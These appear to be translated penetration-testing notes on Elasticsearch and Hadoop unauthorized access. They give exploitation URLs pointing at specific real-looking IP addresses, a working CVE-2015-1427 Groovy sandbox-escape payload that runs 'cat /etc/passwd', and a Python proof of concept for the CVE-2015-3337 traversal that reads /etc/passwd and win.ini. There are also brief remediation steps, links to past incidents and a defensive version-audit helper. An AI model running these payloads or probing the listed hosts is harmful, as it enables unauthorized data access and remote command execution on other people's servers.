Basic notes
VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html
Further reading
https://www.ichunqiu.com/course/1413
Redis unauthorized access
Other NoSQL unauthorized access
MongoDB, Redis, ES, Memcached, Hadoop
Vulnerability description
ElasticSearch is an enterprise-grade search service written in Java. Starting the service opens port 9200 by default, and the data behind it can then be manipulated without authorization.
Vulnerability detection
Default port 9200, HTTP protocol
The response body contains "You Know, for Search"
(AWVS can also find it)
Generally, most instances with this problem are ElasticSearch left at its default configuration, so checking 9200 is enough (a rough check only considers 9200; if you are on the defending side, you should still sweep every port). If the service is not on 9200, it usually means ops or the developers are already thinking about security, and there is no need to dig further.
Some exploitation URLs
Node URLs
http://101.198.161.130:9200/_cat/indices/
http://101.198.161.130:9200/_plugin/head/
http://101.198.161.130:9200/_nodes
http://101.198.161.130:9200/_nodes?prettify
http://101.198.161.130:9200/_status
http://101.198.161.130:9200/_search?pretty
http://10.203.9.131:9200/zjftu/
http://10.203.9.131:9200/zjftu/_search?pretty
Hadoop unauthorized access
http://103.15.200.81:50070/dfshealth.jsp
http://103.15.200.81:50070/logs/
Vulnerability impact
Data can be manipulated without authorization, affecting the site's data.
Remediation
1. Close port 9200
2. Block external access to this port at the firewall.
Historical incidents
SecPulse search
WooYun mirror search
CNVD search
1 360 Mobile: an Elasticsearch unauthorized access (2016-04-19)
https://www.secpulse.com/archives/46394.html
2 Baofeng: Elasticsearch unauthorized access & Hadoop unauthorized access on a site (2016-04-27)
https://www.secpulse.com/archives/49115.html
3 Xinhuanet: Elasticsearch misconfiguration on a channel server / arbitrary operations / interviewee information involved (2016-03-19)
https://www.secpulse.com/archives/46976.html
(ElasticSearch RCE)
4 神器而已's securities series: Elasticsearch remote code execution on a Jiuzhou Securities site (2015-09-11 18:30)
(contains a little intranet methodology)
https://www.secpulse.com/archives/39822.html
5 Funshion: Elasticsearch misconfiguration on a site (arbitrary file read)
https://www.secpulse.com/archives/41126.html
6 A server in Shanghai: Elasticsearch misconfiguration / arbitrary operations / large amount of sensitive information (over 7.9 million users' names, ID numbers, ethnicity, check-in time, check-out time, room number, etc.) (2016-03-16)
https://www.secpulse.com/archives/46801.html
7 Guangxi Mobile: Elasticsearch misconfiguration / arbitrary operations / large amount of sensitive information (user phone numbers / IMEI / IMSI / online time / location, etc.)
https://www.secpulse.com/archives/46798.html
ElasticSearch Groovy RCE (CVE-2015-1427)
Affected range
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
Send a POST to the following link
http://127.0.0.1:9200/_search?pretty
The POST data field is as follows

```json
{
  "size": 1,
  "script_fields": {
    "iswin": {
      "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()",
      "lang": "groovy"
    }
  }
}
```
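The detection rule above (the "You Know, for Search" tagline on port 9200) and the affected-version range of CVE-2015-1427 can be combined into a small audit helper for hosts you administer. The following Python 3 script is an added example, not code from the original page or from any of the linked writeups; it assumes the root endpoint returns JSON of the shape {"version": {"number": ...}, "tagline": ...}, and the sample body it parses is constructed, not captured from a real host.

```python
#!/usr/bin/env python3
"""Added example (not from the original page): parse the JSON an
Elasticsearch root endpoint returns (assumed shape: {"version":
{"number": ...}, "tagline": ...}) and flag the CVE-2015-1427 range."""
import json

TAGLINE = "You Know, for Search"

# Constructed sample body (not captured from any real host), shaped like
# an unauthenticated http://host:9200/ response from a 1.4.x node.
SAMPLE_BODY = json.dumps({
    "status": 200,
    "name": "node-1",
    "version": {"number": "1.4.2", "build_hash": "placeholder"},
    "tagline": TAGLINE,
})


def parse_version(number: str) -> tuple:
    """'1.4.2' -> (1, 4, 2); a suffix such as '-beta1' is ignored."""
    return tuple(int(p) for p in number.split("-")[0].split("."))


def groovy_rce_affected(number: str) -> bool:
    """CVE-2015-1427 range as stated on the page: before 1.3.8,
    or a 1.4.x release before 1.4.3."""
    v = parse_version(number)
    if v[:2] == (1, 4):
        return v < (1, 4, 3)
    return v < (1, 3, 8)


def audit_root_response(body: str) -> dict:
    """Classify a root-endpoint body fetched with no credentials."""
    finding = {"elasticsearch": False, "unauthenticated": False,
               "version": None, "groovy_rce_affected": False}
    try:
        data = json.loads(body)
    except ValueError:
        return finding          # not JSON: not an ES root endpoint
    if not isinstance(data, dict) or data.get("tagline") != TAGLINE:
        return finding          # no tagline: not an ES banner
    finding["elasticsearch"] = True
    finding["unauthenticated"] = True   # banner served without auth
    number = data.get("version", {}).get("number")
    if number:
        finding["version"] = number
        finding["groovy_rce_affected"] = groovy_rce_affected(number)
    return finding
```

A result with "unauthenticated" set is exactly the condition the remediation section addresses: the banner should not be reachable from outside the firewall at all, regardless of version.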
Several other exploits
https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761
es_poc_1.py

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests

host = "10.203.9.131"
port = 9200


def elastic_directoryTraversal(host, port):
    # Site plugins that are commonly installed; each is tried as a base path
    pluginList = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']
    # Plain "../" traversal, then overlong-UTF-8 encoded variants
    pList = [
        '/../../../../../../../../../../../../../../etc/passwd',
        '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd',
        '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini',
    ]
    for p in pluginList:
        for path in pList:
            urlA = "http://%s:%d/_plugin/%s%s" % (host, port, p, path)
            try:
                # .text (not .content) so the substring check below works on str in Python 3
                content = requests.get(urlA, timeout=5, allow_redirects=True, verify=False).text
                print(content)
                print("\n-------------------------------------------------------------\n")
                if "/root:/" in content:
                    print('Elasticsearch 任意文件讀取漏洞(CVE-2015-3337) Found!')
            except Exception as e:
                print(e)


elastic_directoryTraversal(host, port)
```